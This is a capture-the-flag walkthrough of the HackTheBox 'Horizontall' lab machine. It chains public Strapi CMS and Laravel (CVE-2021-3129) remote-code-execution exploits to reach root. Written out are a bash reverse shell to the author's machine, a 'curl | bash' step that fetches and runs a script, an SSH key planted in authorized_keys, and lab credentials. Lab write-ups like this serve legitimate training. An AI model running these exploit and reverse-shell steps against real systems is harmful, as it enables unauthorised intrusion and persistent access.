Horizontall HackTheBox WalkThrough
This is Horizontall HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Horizontall HackTheBox
machine. Before starting let us know something about this box. It is a Linux OS
box with IP address 10.10.11.105
and difficulty level easy
assigned by its maker.
First of all, connect your PC with HackTheBox VPN
and confirm your connectivity with Horizontall machine by pinging its IP 10.10.11.105
. If all goes correct then it’s time to start hacking.
As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing
various services running over different ports and sometimes it helps in vulnerability assessment also. I have used $ nmap
(a popular Port Scanner) for this task and the result is given below: –
Scanning
$ sudo nmap -sC -sV -p- -oN full-port.nmap 10.10.11.105
Full port scan with nmap
revealed port 22
and 80
as open. OpenSSH 7.6p1
is running on port 22 and nginx 1.14.0
web server is running on port 80. Googled for vulnerabilities in OpenSSH and Nginx but no any useful vulnerability found. Also, nmap script http-title
revealed a virtual host horizontall.htb
. So, before going further for any enumeration let us add horizontall.htb to our hosts file, hosts
file is located in the directory /etc/
.
Hosts File After Modification 1
$ cat /etc/hosts
On visiting the URL http://horizontall.htb/ got simple UI saying Build website using HT
. After checking the source-code
and other stuffs on the website, could not find any useful information.
So moved forward for Directory and Virtual Host bruteforcing. Directory bruteforcing with $ dirsearch
and wordlist directory-list-2.3-medium.txt
couldn’t find any useful file and folder. But, Virtual Host bruteforcing with $ ffuf
and wordlist subdomains-top1million-110000.txt
found a virtual host api-prod.horizontall.htb
.
$ ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb -H "Host: FUZZ.horizontall.htb" -mc 200 -c
Let us add api-prod.horizontall.htb
to our hosts file.
Hosts File After Modification 2
$ cat /etc/hosts
Ongoing to the URL http://api-prod.horizontall.htb/ found a simple page containing Welcome
.
Then directory brute forced on this subdomain using $ dirsearch
and wordlist directory-list-2.3-medium.txt
.
$ sudo dirsearch -u http://api-prod.horizontall.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e all -x 404,403,301,303 -t 100
Directory bruteforcing revealed admin
& reviews
pages. Ongoing to http://api-prod.horizontall.htb/admin/ found the login page of strapi CMS
.
Then I googled for the version of strapi CMS
, vulnerabilities associated with them and how to find the version of strapi CMS being used. Luckily, got this link which shows how to find the version of strapi CMS. Following this link http://api-prod.horizontall.htb/admin/strapiVersion I found that the installed version of strapi is 3.0.0-beta.17.4
Then a quick googling on the vulnerabilities of strapi CMS revealed that version 3.0.0-beta.17.4
is vulnerable to Unauthenticated Remote Code Execution
and its public exploit is also present. Check this link on exploit-db
.
Tip: It is always a good idea to check the vulnerabilities associated with them whenever you get any software or framework version during enumeration phase in any CTF.
Confirming RCE
To confirm Remote Code Execution
on Horizontall machine follow the steps below.
$ wget https://www.exploit-db.com/download/50239 -O exploit.py
$ python3 exploit.py http://api-prod.horizontall.htb
$> whoami
After successful exploitation we get an Authenticated JSON web token and credential admin
: SuperStrongPassword1
.
We can use this credential to login at URL http://api-prod.horizontall.htb/admin/. Since it is a Blind
RCE
that’s why we can’t see any output on screen. We can confirm it from above screenshot.
Checking Connectivity with Kali Machine
To confirm whether we can get a reverse shell on our Kali machine, we need to check the connectivity of horizontall machine with our Kali machine. For checking the connectivity, I pinged my Kali box from horizontall machine and it was pinging.
$> ping -c 3 10.10.16.7
$ sudo tcpdump -i tun0 icmp
Now its time to get reverse shell using some one liner. You can get a list of one liner from this link.
Getting User Shell
To get reverse shell follow the given steps :
On Kali Machine
In window 1
$ echo '#!/usr/bin/bash'>shell.sh
$ echo 'bash -i >& /dev/tcp/10.10.16.7/9001 0>&1'>>shell.sh # Don’t forget to replace the IP with your Kali machine IP
$ cat shell.sh
$ sudo python3 -m http.server 80
In window 2
$ nc -nvlp 9001
$ whoami && id
On Horizontall Machine
$> curl http://10.10.16.7/shell.sh | bash
We have successfully got user shell. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.
Upgrading Shell
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
$ CTRL + Z # to background the shell
$ stty raw -echo
$ fg # then 2 times enter to foreground the shell
$ export TERM=xterm-256color
$ stty -a | head -n1
$ stty rows 43 columns 174
Capture User Flag
$ cat /home/developer/user.txt
Privilege Escalation
To escalate the privilege to root we have to first find a privilege escalation vector
using which we can perform privilege escalation. We can find PrivEsc vector either manually or using some post exploitation enumeration scripts
like linpeas.sh, LinEnum.sh and there are a lot more. This time I go for manual enumeration.
Finding PrivEsc Vector
$ ss -lnpt
command revealed that ports 3306
, 1337
and 8000
are listening locally. There must be some services running over them.
MySQL server is running over port 3306. I tried to login into the server using the credential developer
: #J!:F9Zt2uI
. I got this credential from the file database.json
which is present in the directory /opt/strapi/myapi/config/environments/development/
. But there was no any useful information present in the databases.
When I tried to access port 1337
it didn’t respond. After accessing the service on port 8000
through the URL http://127.0.0.1:8000 found that the application running over this service is made of Laravel v8
.
$ curl http://127.0.0.1:8000 | grep -A3 -B4 -i "Laravel v8"
Soon I got information about the Laravel
immediately, I searched for the vulnerability and its exploit. After some research found that Laravel (<=v8.4.2)
is vulnerable to Remote Code Execution
when debug
mode is enabled. For more info about this vulnerability check the CVE CVE-2021-3129
. After checking the exploit at this URL found that it downloads phpgcc
library from the GitHub while it executes on vulnerable machine. Since HackTheBox
doesn’t have access to external Internet, so we can’t execute this exploit on horizontall machine. For this we have to Local Port Forward
port 8000
to our Kali machine, only then we can execute the exploit. Check last 5th line of code in below screenshot.
We will use SSH
for Local Port Forwarding. But we don’t have any SSH credential yet so we need to create one.
Since we have access to strapi user we can introduce our SSH public key
from our id_rsa.pub
file into the authorized_keys
file of user strapi
and then we can connect to horizontall machine using our SSH private key
viz. id_rsa
. So let us create a pair of RSA key using the command $ ssh-keygen
.
On Kali Machine
$ ssh-keygen
$ cat ~/.ssh/id_rsa.pub
On Horizontall Machine
$ pwd
$ mkdir .ssh
$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDqvcT8ZYbpNsiqZ53qceUd1JbnaugzrTrdFJm1Jpfn0YBdcFxMM4SLuLEANZ5kUJWS147CAgAbe2ufJT7HOPi09jjB9d21DcfcsiZA7NJ9rJU0g1PWXwUm1WyZIgoRGh3cOw+JnnampekaowAJyIDWZnBjSUjoybBGL8EfjdDXXTxoim/b8RP6vpjwJYrTJiuWFNDyHeIej4WCklr3TwuiAy7KZ67mn8ICRpNpdbndPwWajJbHKe2Ua3KX/gnk5wJOF1tCxtdZQ4qFPwvg4I5ZirIQDsfJ/JoperybYknHMiAGoL2GagXzwBuj6jgoFRDzkRQ9sT5lYZ5GObAijWEuThL+VclpRGb+LreCy13fLCb3upRT7tZFx7KPB0oSgpWU/RLvffoeKweKoLdSD8eIjbI/mOdbnNJVqAz/8HrbvtfcIfmDFCB8XcS7YhpItZFq6wPLhNr+xJuutTbVZcAXCHP4aVEtKAX2Q29tmNBcAgfDa2cdcKQXFFlbWikufLE= deepak@kali">/opt/strapi/.ssh/authorized_keys
$ cat /opt/strapi/.ssh/authorized_keys
We have successfully transferred our public key to authorized_keys
of user strapi
on horizontall.
Local Port Forwarding
Let us login into the strapi SSH account using our id_rsa
key and Local Port Forward port 8000 to our kali machine.
$ chmod 400 ~/.ssh/id_rsa
$ ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 [email protected]
We can check the forwarded port using the command $ ss -lnpt
Now we can access the service which is running over port 8000 on horizontall machine to port 8000 on our Kali machine using the URL http://localhost:8000/.
When I tried to escalate the privilege using this exploit I could easily perform privilege escalation. So here out potential PrivEsc vector is Privilege Escalation by exploiting Vulnerable Software Version
.
Getting Root by Privilege Escalation
To perform Privilege Escalation, follow the steps given at this URL or follow below steps.
$ git clone https://github.com/nth347/CVE-2021-3129_exploit.git
$ cd CVE-2021-3129_exploit
$ chmod +x exploit.py
$ ./exploit.py http://localhost:8000 Monolog/RCE1 id
We can clearly see that we have successfully escalated the privilege to root as the output of $ id
command is
uid=0(root) gid=0(root) groups=0(root)
.
Capture Root Flag
Let us capture root flag.
$ ./exploit.py http://localhost:8000 Monolog/RCE1 'cat /root/root.txt'
This was how I rooted Horizontall HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the walkthrough feel free to write us at [email protected]